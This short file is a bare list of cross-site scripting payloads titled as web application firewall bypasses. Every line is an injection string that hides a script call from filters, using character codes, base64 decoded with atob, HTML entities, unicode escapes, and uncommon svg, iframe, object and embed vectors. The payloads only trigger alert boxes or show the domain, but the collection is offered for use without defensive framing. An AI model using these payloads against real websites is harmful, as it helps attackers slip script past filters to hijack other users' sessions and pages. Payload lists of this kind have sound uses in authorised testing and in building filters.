# XSS WAF Bypass Payloads
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<svg/onload=alert`1`>
<script>alert(/XSS/.source)</script>
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<img src=x onerror=alert(document.domain)>
<iframe srcdoc="<img src=x onerror=alert(1)>">
<object data="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">
